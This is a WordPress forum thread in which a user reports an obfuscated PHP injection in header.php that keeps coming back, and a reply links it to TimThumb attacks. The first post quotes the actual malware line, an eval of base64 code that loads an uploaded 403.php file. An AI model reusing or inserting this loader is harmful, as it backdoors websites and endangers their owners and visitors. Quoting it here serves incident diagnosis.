Hacked: Code inserted into header.php (3 posts)

  1. coopersita
    Posted 4 years ago #


    I get the following code inserted into my header.php in 2 separate sites (both hosted on Dreamhost):

    <?define('USE_DIRA', '/wp-includes/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>

    Before, the directory was going to the images folder in the default theme, but I deleted the theme, deleted the code, and it appeared again, but now pointing to the images folder in wp-includes.

    In those images folders, 2 files were uploaded: 403.php and links.db.

    I changed all my passwords (db user, and dreamhost login). WordPress is up to date.

    I've deleted the code twice, and it comes up again.

    Any ideas on how they are getting in?

  2. Samuel B
    Posted 4 years ago #

  3. MickeyRoush
    Posted 4 years ago #

    Sucuri.net discovered that the TimThumb attacks are infecting the header.php files now as well. May or may not be related to your issue(s).


Topic Closed

This topic has been closed to new replies.

About this Topic